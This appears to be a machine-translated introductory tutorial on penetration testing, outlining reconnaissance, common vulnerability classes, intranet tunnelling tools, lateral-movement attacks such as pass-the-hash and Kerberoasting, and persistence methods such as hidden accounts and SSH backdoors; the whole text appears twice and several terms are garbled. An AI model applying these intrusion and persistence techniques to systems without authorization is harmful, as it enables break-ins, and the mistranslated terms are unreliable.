Introduction to Penetration Testing
Penetration testing is to simulate an attacker's intrusion into the system, penetrate the system step by step, and discover the vulnerable links and hidden risks of the system. Finally, a test report is formed and provided to the system owner. The system owner can strengthen the system according to the test report to improve the security of the system and prevent real attackers from invading.
The premise of penetration testing must be authorized by the system owner!
Penetration testing without authorization is illegal!
Penetration testing meaning
An important method of information security assessment, which is conducive to grasping the overall security strength of the system.
Simulate hacking and thinking to assess potential computer risks.
Discover system weaknesses and paths that may be exploited, and prevent them in advance.
With authorization, there is no risk of intrusion.
Penetration Testing Methodology
-- White box testing
Infiltration is performed when the overall information and source code of the target is known, similar to code auditing.
-- Black box testing
Only the target is known, and the rest of the information is unknown, completely simulating hacking.
-- Gray box testing
Knowing the target part information, such as architecture and network topology, the way to infiltrate.
(It can also be divided into manual testing and automated testing according to other methods)
General process of penetration testing
Preparation stage—>Information collection—>Vulnerability detection—>Vulnerability utilization—>Intranet forwarding—>Intranet penetration—>Trace removal—>Writing a report
--Preparation Phase
Obtain authorization Develop plans Determine objectives Test environment determination Test scope and depth Test time determination Test risk management
--collect message
Two methods of information collection
Active Information Collection: Access or scan a target.
Passive information collection: Collection of targeted information through third parties.
Main information collected
1. Whether domain name information, ip, subdomain name, DNS record exists CDN. Available tools for subdomain collection: Layer subdomain digger, findmain, etc.
2. Public network information. information about the target. Employee information, email address, registrant, etc.; find sensitive information on code hosting platforms such as Github.
3. Website fingerprinting. Server Type (Windows\Linux) Website Container (Apache\Nginx\Tomcat\IIS)
Script type (php\jsp\asp\aspx) Database type (mysql\oracle\access\sqlserver\redis)
4. Server port openness. You can use tools such as nmap Yujian
ssh weak password 22 mysql weak password 3306 redis unauthorized 6379
weblogic deserialization vulnerability 7001 web middleware vulnerability 80
5. Sensitive directories. You can use Yujian, wwwscan, dirmap, etc. to scan
Background directory, the default path.
6. Side station and section c
Side sites refer to other websites on the same server. Can use the side station to infiltrate.
Section c refers to other servers in the same network segment. Infiltrate and escalate the server in the same target C segment, and then infiltrate the target.
Common scanning tools: Nessus, X-SCAN NAMP
--Vulnerability detection
Mainly based on PWASP Top10
1. Injection SQL injection, XXE injection, LDAP injection, system command injection, remote code execution
2. Invalid identity authentication and session management, weak password brute force cracking, cookie forgery and cookie bypass, logic bypass login, session hijacking
3. Cross-site scripting attack XSS
4. Ineffective access control Unauthorized access, unauthorized access (horizontal and vertical unauthorized access), file operation (file upload, file inclusion, arbitrary file download)
5. Security configuration errors High-risk ports (22, 445, 3389, 6379), database, web middleware, CORS cross-domain resource sharing vulnerabilities, directory vulnerabilities
6. Leakage of sensitive information Weak files (phpinfo, backup files, installation files), source code, configuration files, database files
7. Insufficient attack detection and prevention WAF, RASP, virtual/real patches
8. Cross-site request forgery CSRF
9. Using components with known vulnerabilities Struts2 code execution, Spring code execution, JAVA deserialization, Heartbleed vulnerability
10. Unprotected APIS Web services, Login API, APP API, DB API, Pay API
Vulnerability detection ideas
1. Injection type vulnerability 2. File type vulnerability 3. Cross-site type vulnerability
4. Configuration vulnerabilities (SSRF vulnerabilities, CORS vulnerabilities, JSONP, XSS, CSRF)
5. Deserialization vulnerabilities (fastjson deserialization vulnerabilities, jboss deserialization vulnerabilities, Apache shiro deserialization vulnerabilities, weblogic deserialization vulnerabilities)
6. Logical loopholes (logic loopholes may exist in functions such as registration and login password modification)
7. Server-type vulnerabilities such as JBoss\Apache\IIS\Weblogic\Tomcat can detect vulnerabilities based on version numbers and sensitive file paths of server types.
8. Third-party library vulnerabilities such as fastjson, struts2, JQuery, OpenSSL
-- Intranet forwarding
Concept, in a traditional network, a firewall is a physical boundary defense, and the network is divided into an internal network and an external network.
After we obtain certain permissions of the external network server (such as web server, FTP server, Mail server, etc.), we find that this server can directly or indirectly access the internal network. However, hosts in the internal network do not allow direct access from the external network. At this time, the external network server can be set as a proxy through port forwarding (tunnel). This process is internal network forwarding.
port forwarding
Intranet Forwarding Ideas
Intranet forwarding usually needs to determine whether the host that has obtained the authorization is out of the network. If the target is out of the network, a reverse proxy can be used. If the target is out of the network, consider using a forward tunnel or port multiplexing.
Intranet Forwarding Ideas
1.reGeorg combines proxychains proxy chain (HTTP tunnel)
Applicable to the situation where the public network server only opens port 80, using the http tunnel.
2. EW (EarthWorm) combined with proxychains proxy chain.
EW is a portable network penetration tool with two core functions of SOCKS5 service erection and port forwarding. , this tool can open a network tunnel and enter the intranet in the "forward", "reverse", "multi-level cascading" and other ways.
3. LCX (lcx is a tool for implementing port forwarding based on socket sockets) implements port forwarding.
--Intranet penetration
Common attack methods
non-domain environment
MS17-010
pass the hash attack
Access Token Stealing and Exploitation
mimikat get RDP credentials
........
domain environment
MS14-068
pass-the-note attack
AS-REP Roasting Attack
Kerberoast attack
........
--Privilege maintenance of intranet penetration
web backdoor
1. Hidden backdoor files 2. Undead 3. 404 page hidden backdoors, or other backdoors with their own files
Windows system
1. To hide the user in the resume, add $ after the user name
2. Prevent Trojan horse files in the startup directory
3. Use tools, use the persistence module in MSF
4. Remote desktop session maintenance
Linux system
1. SSH backdoor 2. crontab timing task 3. SSH public key 4. Create a user with SUID=0
Introduction to Penetration Testing
Penetration testing is to simulate an attacker's intrusion into the system, penetrate the system step by step, and discover the vulnerable links and hidden risks of the system. Finally, a test report is formed and provided to the system owner. The system owner can strengthen the system according to the test report to improve the security of the system and prevent real attackers from invading.
The premise of penetration testing must be authorized by the system owner!
Penetration testing without authorization is illegal!
Penetration testing meaning
An important method of information security assessment, which is conducive to grasping the overall security strength of the system.
Simulate hacking and thinking to assess potential computer risks.
Discover system weaknesses and paths that may be exploited, and prevent them in advance.
With authorization, there is no risk of intrusion.
Penetration Testing Methodology
-- White box testing
Infiltration is performed when the overall information and source code of the target is known, similar to code auditing.
-- Black box testing
Only the target is known, and the rest of the information is unknown, completely simulating hacking.
-- Gray box testing
Knowing the target part information, such as architecture and network topology, the way to infiltrate.
(It can also be divided into manual testing and automated testing according to other methods)
General process of penetration testing
Preparation stage—>Information collection—>Vulnerability detection—>Vulnerability utilization—>Intranet forwarding—>Intranet penetration—>Trace removal—>Writing a report
--Preparation Phase
Obtain authorization Develop plans Determine objectives Test environment determination Test scope and depth Test time determination Test risk management
--collect message
Two methods of information collection
Active Information Collection: Access or scan a target.
Passive information collection: Collection of targeted information through third parties.
Main information collected
1. Whether domain name information, ip, subdomain name, DNS record exists CDN. Available tools for subdomain collection: Layer subdomain digger, findmain, etc.
2. Public network information. information about the target. Employee information, email address, registrant, etc.; find sensitive information on code hosting platforms such as Github.
3. Website fingerprinting. Server Type (Windows\Linux) Website Container (Apache\Nginx\Tomcat\IIS)
Script type (php\jsp\asp\aspx) Database type (mysql\oracle\access\sqlserver\redis)
4. Server port openness. You can use tools such as nmap Yujian
ssh weak password 22 mysql weak password 3306 redis unauthorized 6379
weblogic deserialization vulnerability 7001 web middleware vulnerability 80
5. Sensitive directories. You can use Yujian, wwwscan, dirmap, etc. to scan
Background directory, the default path.
6. Side station and section c
Side sites refer to other websites on the same server. Can use the side station to infiltrate.
Section c refers to other servers in the same network segment. Infiltrate and escalate the server in the same target C segment, and then infiltrate the target.
Common scanning tools: Nessus, X-SCAN NAMP
--Vulnerability detection
Mainly based on PWASP Top10
1. Injection SQL injection, XXE injection, LDAP injection, system command injection, remote code execution
2. Invalid identity authentication and session management, weak password brute force cracking, cookie forgery and cookie bypass, logic bypass login, session hijacking
3. Cross-site scripting attack XSS
4. Ineffective access control Unauthorized access, unauthorized access (horizontal and vertical unauthorized access), file operation (file upload, file inclusion, arbitrary file download)
5. Security configuration errors High-risk ports (22, 445, 3389, 6379), database, web middleware, CORS cross-domain resource sharing vulnerabilities, directory vulnerabilities
6. Leakage of sensitive information Weak files (phpinfo, backup files, installation files), source code, configuration files, database files
7. Insufficient attack detection and prevention WAF, RASP, virtual/real patches
8. Cross-site request forgery CSRF
9. Using components with known vulnerabilities Struts2 code execution, Spring code execution, JAVA deserialization, Heartbleed vulnerability
10. Unprotected APIS Web services, Login API, APP API, DB API, Pay API
Vulnerability detection ideas
1. Injection type vulnerability 2. File type vulnerability 3. Cross-site type vulnerability
4. Configuration vulnerabilities (SSRF vulnerabilities, CORS vulnerabilities, JSONP, XSS, CSRF)
5. Deserialization vulnerabilities (fastjson deserialization vulnerabilities, jboss deserialization vulnerabilities, Apache shiro deserialization vulnerabilities, weblogic deserialization vulnerabilities)
6. Logical loopholes (logic loopholes may exist in functions such as registration and login password modification)
7. Server-type vulnerabilities such as JBoss\Apache\IIS\Weblogic\Tomcat can detect vulnerabilities based on version numbers and sensitive file paths of server types.
8. Third-party library vulnerabilities such as fastjson, struts2, JQuery, OpenSSL
-- Intranet forwarding
Concept, in a traditional network, a firewall is a physical boundary defense, and the network is divided into an internal network and an external network.
After we obtain certain permissions of the external network server (such as web server, FTP server, Mail server, etc.), we find that this server can directly or indirectly access the internal network. However, hosts in the internal network do not allow direct access from the external network. At this time, the external network server can be set as a proxy through port forwarding (tunnel). This process is internal network forwarding.
port forwarding
Intranet Forwarding Ideas
Intranet forwarding usually needs to determine whether the host that has obtained the authorization is out of the network. If the target is out of the network, a reverse proxy can be used. If the target is out of the network, consider using a forward tunnel or port multiplexing.
Intranet Forwarding Ideas
1.reGeorg combines proxychains proxy chain (HTTP tunnel)
Applicable to the situation where the public network server only opens port 80, using the http tunnel.
2. EW (EarthWorm) combined with proxychains proxy chain.
EW is a portable network penetration tool with two core functions of SOCKS5 service erection and port forwarding. , this tool can open a network tunnel and enter the intranet in the "forward", "reverse", "multi-level cascading" and other ways.
3. LCX (lcx is a tool for implementing port forwarding based on socket sockets) implements port forwarding.
--Intranet penetration
Common attack methods
non-domain environment
MS17-010
pass the hash attack
Access Token Stealing and Exploitation
mimikat get RDP credentials
........
domain environment
MS14-068
pass-the-note attack
AS-REP Roasting Attack
Kerberoast attack
........
--Privilege maintenance of intranet penetration
web backdoor
1. Hidden backdoor files 2. Undead 3. 404 page hidden backdoors, or other backdoors with their own files
Windows system
1. To hide the user in the resume, add $ after the user name
2. Prevent Trojan horse files in the startup directory
3. Use tools, use the persistence module in MSF
4. Remote desktop session maintenance
Linux system
1. SSH backdoor 2. crontab timing task 3. SSH public key 4. Create a user with SUID=0